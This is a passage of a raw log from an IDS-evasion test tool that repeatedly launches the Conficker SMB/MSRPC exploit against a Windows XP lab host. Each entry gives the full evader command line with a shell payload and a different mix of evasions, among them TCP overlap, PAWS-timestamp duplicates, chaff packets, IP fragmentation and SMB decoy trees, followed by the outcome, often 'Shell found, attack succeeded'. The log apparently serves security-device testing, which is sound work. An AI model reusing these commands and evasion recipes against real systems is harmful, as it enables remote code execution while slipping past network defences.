  765. Info: NetBIOS connection 10.62.90.112:49313 -> 10.35.1.207:445
  766. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  767. Info: Sending MSRPC request with exploit
  768. Info: Shell found, attack succeeded
  769. Info: Shell closed
  770. 0: Success.
  771. .........
  772. 1186 runs averaging 1.95 runs / second ; progress: 609/43200......
  773. 1192 runs averaging 1.94 runs / second ; progress: 614/43200.......
  774. 1199 runs averaging 1.94 runs / second ; progress: 619/43200..Pid 1385 timed out - killed
  775. 2015-06-07 23:29:50 INFO
  776. Timed out (10.62.90.119):
  777. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39203 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/6+woTIRZQ --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
  778. Info: Using random seed d/6+woTIRZR
  779. The following evasions are applied from stage smb_opentree to msrpc_bind:
  780. - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  781. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  782. - Add a zero urgent data byte to every 1 TCP segment.
  783.  
  784. Info: NetBIOS connection 10.62.90.119:39203 -> 10.35.1.207:445
  785. Terminated
  786. ..2015-06-07 23:29:52 INFO
  787. Success. (10.62.90.113):
  788. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26962 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=JpRj3RSvUgQ --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","7","2","random_msrpcbind" --evasion=[start,netbios_connect]tcp_paws,"5","208562135","alpharandomized" --evasion=[start,msrpc_bind]tcp_paws,"8","203623296","shuffle" --verifydelay=1000 --payload=shell
  789. Info: Using random seed JpRj3RSvUgQ
  790. The following evasions are applied from stage start to netbios_connect:
  791. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208562135> and has original payload with alphabetic bytes randomized
  792. The following evasions are applied from stage start to msrpc_bind:
  793. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 203623296> and has shuffled original payload
  794. The following evasions are applied from stage smb_opentree to msrpc_req:
  795. - Before normal SMB writes, 5 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
  796.  
  797. Info: NetBIOS connection 10.62.90.113:26962 -> 10.35.1.207:445
  798. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  799. Info: Sending MSRPC request with exploit
  800. Info: Shell found, attack succeeded
  801. Info: Shell closed
  802. 0: Success.
  803. ....
  804. 1209 runs averaging 1.94 runs / second ; progress: 624/43200.......
  805. 1216 runs averaging 1.93 runs / second ; progress: 629/43200.........
  806. 1225 runs averaging 1.93 runs / second ; progress: 634/43200.
  807. 1226 runs averaging 1.92 runs / second ; progress: 639/43200..Pid 1869 timed out - killed
  808. 2015-06-07 23:30:10 INFO
  809. Timed out (10.62.90.115):
  810. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39459 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=e7ylkdMUHfM --evasion=[smb_connect,msrpc_bind]tcp_chaff,"50%","chksum|outofwindow|shorthdr","shuffle30" --evasion=[smb_opentree,end]tcp_chaff,"1","chksum|nullchksum|outofwindow|shorthdr|longhdr","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
  811. Info: Using random seed e7ylkdMUHfN
  812. The following evasions are applied from stage smb_connect to msrpc_bind:
  813. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  814. * Invalid TCP checksum.
  815. * An out-of-window sequence number.
  816. * TCP header shorter than 20 bytes
  817. * Duplicate packet has 30 bytes of original payload, then shuffled original payload
  818. The following evasions are applied from stage smb_opentree to end:
  819. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  820. * Invalid TCP checksum.
  821. * NULL TCP checksum.
  822. * An out-of-window sequence number.
  823. * TCP header shorter than 20 bytes
  824. * TCP header longer than packet total size
  825. * Duplicate packet has shuffled original payload
  826. The following evasions are applied from stage smb_opentree to msrpc_req:
  827. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
  828.  
  829. Info: NetBIOS connection 10.62.90.115:39459 -> 10.35.1.207:445
  830. Terminated
  831. .Pid 1876 timed out - killed
  832. 2015-06-07 23:30:11 INFO
  833. Timed out (10.62.90.114):
  834. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12116 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=GT8tDxBjFyg --evasion=[start,smb_connect]ipv4_opt,"1","inc","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  835. Info: Using random seed GT8tDxBjFyg
  836. The following evasions are applied from stage start to smb_connect:
  837. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  838. The duplicate packet has random bytes as payload
  839. The following evasions are applied from stage smb_openpipe to msrpc_req:
  840. - Add a random urgent data byte to every 1 TCP segment.
  841.  
  842. Info: NetBIOS connection 10.62.90.114:12116 -> 10.35.1.207:445
  843. Terminated
  844. .......
  845. 1238 runs averaging 1.92 runs / second ; progress: 644/43200...Pid 1971 timed out - killed
  846. 2015-06-07 23:30:16 INFO
  847. Timed out (10.62.90.111):
  848. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43442 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=HPkkhP7YkHU --evasion=[smb_openpipe,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  849. Info: Using random seed HPkkhP7YkHU
  850. The following evasions are applied from stage smb_opentree to msrpc_req:
  851. - Add a zero urgent data byte to every 2 TCP segment.
  852. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  853. - TCP timestamps echo reply value is sent in the wrong endianness
  854.  
  855. Info: NetBIOS connection 10.62.90.111:43442 -> 10.35.1.207:445
  856. Terminated
  857. ....2015-06-07 23:30:18 INFO
  858. Success. (10.62.90.115):
  859. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46188 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=1HDuHIYDD40 --evasion=[start,end]tcp_paws,"50%","9","random_alphanum" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  860. Info: Using random seed 1HDuHIYDD43
  861. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
  862. The following evasions are applied from stage smb_connect to end:
  863. - TCP timestamps echo reply value is sent in the wrong endianness
  864.  
  865. Info: NetBIOS connection 10.62.90.115:46188 -> 10.35.1.207:445
  866. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  867. Info: Sending MSRPC request with exploit
  868. Info: Shell found, attack succeeded
  869. Info: Shell closed
  870. 0: Success.
  871. ......
  872. 1253 runs averaging 1.93 runs / second ; progress: 649/43200................
  873. 1269 runs averaging 1.94 runs / second ; progress: 654/43200...............
  874. 1284 runs averaging 1.95 runs / second ; progress: 659/43200....................
  875. 1304 runs averaging 1.96 runs / second ; progress: 664/43200............
  876. 1316 runs averaging 1.97 runs / second ; progress: 669/43200............
  877. 1328 runs averaging 1.97 runs / second ; progress: 674/43200..............
  878. 1342 runs averaging 1.97 runs / second ; progress: 680/43200..............
  879. 1356 runs averaging 1.98 runs / second ; progress: 685/432002015-06-07 23:30:55 INFO
  880. Success. (10.62.90.114):
  881. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24700 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=NCyRKw2M+QU --evasion=[start,netbios_connect]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","110160382","alphanumrandomized" --verifydelay=1000 --payload=shell
  882. Info: Using random seed NCyRKw2M+QU
  883. The following evasions are applied from stage start to netbios_connect:
  884. - IPv4 fragments with at most 1464 bytes per fragment
  885. The following evasions are applied from stage netbios_connect to msrpc_req:
  886. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 110160382> and has original payload with alphanumeric bytes randomized
  887.  
  888. Info: NetBIOS connection 10.62.90.114:24700 -> 10.35.1.207:445
  889. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  890. Info: Sending MSRPC request with exploit
  891. Info: Shell found, attack succeeded
  892. Info: Shell closed
  893. 0: Success.
  894. .............
  895. 1370 runs averaging 1.99 runs / second ; progress: 690/43200........
  896. 1378 runs averaging 1.98 runs / second ; progress: 695/43200............
  897. 1390 runs averaging 1.99 runs / second ; progress: 700/43200............
  898. 1402 runs averaging 1.99 runs / second ; progress: 705/43200.......
  899. 1409 runs averaging 1.99 runs / second ; progress: 710/43200.............
  900. 1422 runs averaging 1.99 runs / second ; progress: 715/43200...........
  901. 1433 runs averaging 1.99 runs / second ; progress: 720/43200.........
  902. 1442 runs averaging 1.99 runs / second ; progress: 725/43200....
  903. 1446 runs averaging 1.98 runs / second ; progress: 730/43200.......
  904. 1453 runs averaging 1.98 runs / second ; progress: 735/43200........
  905. 1461 runs averaging 1.98 runs / second ; progress: 740/43200.2015-06-07 23:31:50 INFO
  906. Success. (10.62.90.114):
  907. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24569 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2cSDsed3ITE --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --verifydelay=1000 --payload=shell
  908. Info: Using random seed 2cSDsed3ITH
  909. The following evasions are applied from stage smb_connect to msrpc_req:
  910. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  911. The duplicate packet has identical payload except that alphanumeric characters are randomized
  912. The following evasions are applied from stage smb_opentree to end:
  913. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  914.  
  915. Info: NetBIOS connection 10.62.90.114:24569 -> 10.35.1.207:445
  916. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  917. Info: Sending MSRPC request with exploit
  918. Info: Shell found, attack succeeded
  919. Info: Shell closed
  920. 0: Success.
  921. .....
  922. 1468 runs averaging 1.97 runs / second ; progress: 745/43200...2015-06-07 23:31:57 INFO
  923. Success. (10.62.90.111):
  924. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64502 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=yxKHXWbMZgw --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"add_null_trailer" --evasion=[start,end]tcp_paws,"50%","3","random_alpha" --verifydelay=1000 --payload=shell
  925. Info: Using random seed yxKHXWbMZgz
  926. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  927. The following evasions are applied from stage msrpc_bind to msrpc_req:
  928. - The SMB filename is obfuscated:
  929. * A 0x00 and random alphanumeric characters are appended to the filename
  930.  
  931. Info: NetBIOS connection 10.62.90.111:64502 -> 10.35.1.207:445
  932. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  933. Info: Sending MSRPC request with exploit
  934. Info: Shell found, attack succeeded
  935. Info: Shell closed
  936. 0: Success.
  937. ...........
  938. 1483 runs averaging 1.98 runs / second ; progress: 750/43200.....
  939. 1488 runs averaging 1.97 runs / second ; progress: 755/43200....
  940. 1492 runs averaging 1.96 runs / second ; progress: 760/43200.2015-06-07 23:32:11 INFO
  941. Success. (10.62.90.115):
  942. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45139 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=dzj0POWrydM --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","6","shuffle" --verifydelay=1000 --payload=shell
  943. Info: Using random seed dzj0POWrydN
  944. The following evasions are applied from stage smb_opentree to msrpc_req:
  945. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
  946. The following evasions are applied from stage smb_opentree to msrpc_bind:
  947. - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  948.  
  949. Info: NetBIOS connection 10.62.90.115:45139 -> 10.35.1.207:445
  950. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  951. Info: Sending MSRPC request with exploit
  952. Info: Shell found, attack succeeded
  953. Info: CommandShell::SendCommand() - Failed to send string
  954. Info: Command shell connection reset.
  955. Info: Shell closed
  956. 0: Success.
  957. ........
  958. 1502 runs averaging 1.96 runs / second ; progress: 765/43200....
  959. 1506 runs averaging 1.96 runs / second ; progress: 770/43200Pid 3944 timed out - killed
  960. 2015-06-07 23:32:22 INFO
  961. Timed out (10.62.90.116):
  962. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42916 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=BSmDZs2V2KY --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  963. Info: Using random seed BSmDZs2V2KY
  964. The following evasions are applied from stage smb_opentree to msrpc_bind:
  965. - Add a random urgent data byte to every 2 TCP segment.
  966. The following evasions are applied from stage msrpc_bind to msrpc_req:
  967. - MSRPC NDR flag is modified:
  968. * Unspecified character encoding
  969. * IBM floating point value encoding
  970. * Reserved 3rd byte is set to a random non-zero value
  971. * Reserved 4th byte is set to a random non-zero value
  972.  
  973.  
  974. Info: NetBIOS connection 10.62.90.116:42916 -> 10.35.1.207:445
  975. Terminated
  976.  
  977. 1507 runs averaging 1.94 runs / second ; progress: 775/43200.
  978. 1508 runs averaging 1.93 runs / second ; progress: 780/43200.........
  979. 1517 runs averaging 1.93 runs / second ; progress: 785/43200.......
  980. 1524 runs averaging 1.93 runs / second ; progress: 790/43200.......
  981. 1531 runs averaging 1.93 runs / second ; progress: 795/43200...
  982. 1534 runs averaging 1.92 runs / second ; progress: 800/43200.
  983. 1535 runs averaging 1.91 runs / second ; progress: 805/43200Pid 4544 timed out - killed
  984. 2015-06-07 23:32:56 INFO
  985. Timed out (10.62.90.118):
  986. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52467 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=4ftBvYDCVZs --evasion=[netbios_connect,end]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  987. Info: Using random seed 4ftBvYDCVZv
  988. The following evasions are applied from stage netbios_connect to end:
  989. - IPv4 fragments with at most 1472 bytes per fragment
  990. The following evasions are applied from stage smb_openpipe to msrpc_req:
  991. - Add a random urgent data byte to every 1 TCP segment.
  992.  
  993. Info: NetBIOS connection 10.62.90.118:52467 -> 10.35.1.207:445
  994. Terminated
  995. ....
  996. 1540 runs averaging 1.90 runs / second ; progress: 810/43200......
  997. 1546 runs averaging 1.90 runs / second ; progress: 815/43200......
  998. 1552 runs averaging 1.89 runs / second ; progress: 820/43200......
  999. 1558 runs averaging 1.89 runs / second ; progress: 825/43200.....
  1000. 1563 runs averaging 1.88 runs / second ; progress: 830/43200..
  1001. 1565 runs averaging 1.87 runs / second ; progress: 835/43200
  1002. 1565 runs averaging 1.86 runs / second ; progress: 840/43200.......
  1003. 1572 runs averaging 1.86 runs / second ; progress: 845/43200Pid 5247 timed out - killed
  1004. 2015-06-07 23:33:36 INFO
  1005. Timed out (10.62.90.117):
  1006. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15300 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=hPpd4kR6QYQ --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  1007. Info: Using random seed hPpd4kR6QYS
  1008. The following evasions are applied from stage smb_opentree to msrpc_req:
  1009. - Add a random alphaurgent data byte to every 2 TCP segment.
  1010. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1011. - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  1012.  
  1013. Info: NetBIOS connection 10.62.90.117:15300 -> 10.35.1.207:445
  1014. Terminated
  1015. ....2015-06-07 23:33:38 INFO
  1016. Success. (10.62.90.117):
  1017. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43645 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=NWacMXl/kLk --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"21","chksum|nullflag|shorthdr|longhdr","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","128119346","random_alpha" --verifydelay=1000 --payload=shell
  1018. Info: Using random seed NWacMXl/kLk
  1019. The following evasions are applied from stage smb_opentree to msrpc_req:
  1020. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 128119346> and has random alpha bytes as payload
  1021. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1022. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1023. * Invalid TCP checksum.
  1024. * NULL TCP control flags.
  1025. * TCP header shorter than 20 bytes
  1026. * TCP header longer than packet total size
  1027. * Duplicate packet has random alpha bytes as payload
  1028.  
  1029. Info: NetBIOS connection 10.62.90.117:43645 -> 10.35.1.207:445
  1030. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1031. Info: Sending MSRPC request with exploit
  1032. Info: Shell found, attack succeeded
  1033. Info: Shell closed
  1034. 0: Success.
  1035. .....
  1036. 1583 runs averaging 1.86 runs / second ; progress: 850/43200..Pid 5416 timed out - killed
  1037. 2015-06-07 23:33:42 INFO
  1038. Timed out (10.62.90.110):
  1039. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30642 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=QbaOab59OMc --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"50%","chksum|nullflag|outofwindow","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
  1040. Info: Using random seed QbaOab59OMd
  1041. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1042. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1043. * An out-of-window sequence number.
  1044. * Duplicate packet has original payload with alphanumeric bytes randomized
  1045. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1046.  
  1047. The following evasions are applied from stage smb_openpipe to end:
  1048. - Add a zero urgent data byte to every 1 TCP segment.
  1049.  
  1050. Info: NetBIOS connection 10.62.90.110:30642 -> 10.35.1.207:445
  1051. Terminated
  1052. ......
  1053. 1592 runs averaging 1.86 runs / second ; progress: 855/43200..2015-06-07 23:33:46 INFO
  1054. Success. (10.62.90.110):
  1055. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17668 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=No54XXttjfs --evasion=[start,end]tcp_initialseq,"3" --evasion=[smb_opentree,end]tcp_paws,"50%","8","random_alpha" --verifydelay=1000 --payload=shell
  1056. Info: Using random seed No54XXttjfs
  1057. - Initial TCP sequence number is set to 0xffffffff - 3
  1058. The following evasions are applied from stage smb_opentree to end:
  1059. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  1060.  
  1061. Info: NetBIOS connection 10.62.90.110:17668 -> 10.35.1.207:445
  1062. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1063. Info: Sending MSRPC request with exploit
  1064. Info: Shell found, attack succeeded
  1065. Info: Shell closed
  1066. 0: Success.
  1067. ...........
  1068. 1606 runs averaging 1.87 runs / second ; progress: 860/43200............
  1069. 1618 runs averaging 1.87 runs / second ; progress: 866/43200.....
  1070. 1623 runs averaging 1.86 runs / second ; progress: 871/43200
  1071. 1623 runs averaging 1.85 runs / second ; progress: 876/43200.....
  1072. 1628 runs averaging 1.85 runs / second ; progress: 881/43200............
  1073. 1640 runs averaging 1.85 runs / second ; progress: 886/43200......
  1074. 1646 runs averaging 1.85 runs / second ; progress: 891/43200...
  1075. 1649 runs averaging 1.84 runs / second ; progress: 896/43200.........
  1076. 1658 runs averaging 1.84 runs / second ; progress: 901/43200...........2015-06-07 23:34:35 INFO
  1077. Success. (10.62.90.111):
  1078. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59061 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Jtc7r4XedFw --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","6","2","random_msrpcreq" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1079. Info: Using random seed Jtc7r4XedFw
  1080. The following evasions are applied from stage smb_connect to msrpc_req:
  1081. - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  1082. The following evasions are applied from stage smb_opentree to end:
  1083. - TCP timestamps echo reply value is sent in the wrong endianness
  1084.  
  1085. Info: NetBIOS connection 10.62.90.111:59061 -> 10.35.1.207:445
  1086. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1087. Info: Sending MSRPC request with exploit
  1088. Info: Shell found, attack succeeded
  1089. Info: Shell closed
  1090. 0: Success.
  1091. .
  1092. 1671 runs averaging 1.85 runs / second ; progress: 906/43200.................
  1093. 1688 runs averaging 1.85 runs / second ; progress: 911/43200Pid 5990 timed out - killed
  1094. 2015-06-07 23:34:41 INFO
  1095. Timed out (10.62.90.112):
  1096. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58631 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zh+fzTjgSBM --evasion=[smb_connect,end]netbios_chaff,"25%","small_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  1097. Info: Using random seed zh+fzTjgSBP
  1098. The following evasions are applied from stage smb_connect to end:
  1099. - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1100. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1101. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  1102.  
  1103. Info: NetBIOS connection 10.62.90.112:58631 -> 10.35.1.207:445
  1104. Terminated
  1105. ...............
  1106. 1704 runs averaging 1.86 runs / second ; progress: 916/432002015-06-07 23:34:46 INFO
  1107. Success. (10.62.90.112):
  1108. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37611 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=O/Vg484ppb0 --evasion=[smb_connect,msrpc_bind]ipv4_frag,"192" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","6","shuffle" --evasion=[smb_opentree,smb_openpipe]tcp_segvar,"1577","40367" --verifydelay=1000 --payload=shell
  1109. Info: Using random seed O/Vg484ppb0
  1110. The following evasions are applied from stage smb_connect to msrpc_bind:
  1111. - IPv4 fragments with at most 192 bytes per fragment
  1112. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1113. - TCP packets are segmented to contain between 1577 and 40367 bytes of payload.
  1114. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1115. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
  1116.  
  1117. Info: NetBIOS connection 10.62.90.112:37611 -> 10.35.1.207:445
  1118. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1119. Info: Sending MSRPC request with exploit
  1120. Info: Shell found, attack succeeded
  1121. Info: Shell closed
  1122. 0: Success.
  1123. ...........
  1124. 1716 runs averaging 1.86 runs / second ; progress: 921/43200.......
  1125. 1723 runs averaging 1.86 runs / second ; progress: 926/43200............
  1126. 1735 runs averaging 1.86 runs / second ; progress: 931/43200...............
  1127. 1750 runs averaging 1.87 runs / second ; progress: 936/43200................
  1128. 1766 runs averaging 1.88 runs / second ; progress: 941/43200....2015-06-07 23:35:13 INFO
  1129. Success. (10.62.90.116):
  1130. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34997 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=If/m9xhogZo --evasion=[netbios_connect,smb_opentree]ipv4_opt,"8","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","267969810","alphanumrandomized" --verifydelay=1000 --payload=shell
  1131. Info: Using random seed If/m9xhogZo
  1132. The following evasions are applied from stage netbios_connect to smb_opentree:
  1133. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1134. The duplicate packet has identical payload except that alphabetic characters are randomized
  1135. The following evasions are applied from stage netbios_connect to msrpc_req:
  1136. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 267969810> and has original payload with alphanumeric bytes randomized
  1137.  
  1138. Info: NetBIOS connection 10.62.90.116:34997 -> 10.35.1.207:445
  1139. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1140. Info: Sending MSRPC request with exploit
  1141. Info: Shell found, attack succeeded
  1142. Info: Command shell connection reset.
  1143. Info: CommandShell::SendCommand() - Failed to send string
  1144. Info: Shell closed
  1145. 0: Success.
  1146. .....
  1147. 1776 runs averaging 1.88 runs / second ; progress: 946/43200................2015-06-07 23:35:21 INFO
  1148. Success. (10.62.90.111):
  1149. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31846 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=g+Vl2tI+pn8 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","1723","random_msrpcreq" --verifydelay=1000 --payload=shell
  1150. Info: Using random seed g+Vl2tI+pn+
  1151. The following evasions are applied from stage smb_connect to end:
  1152. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
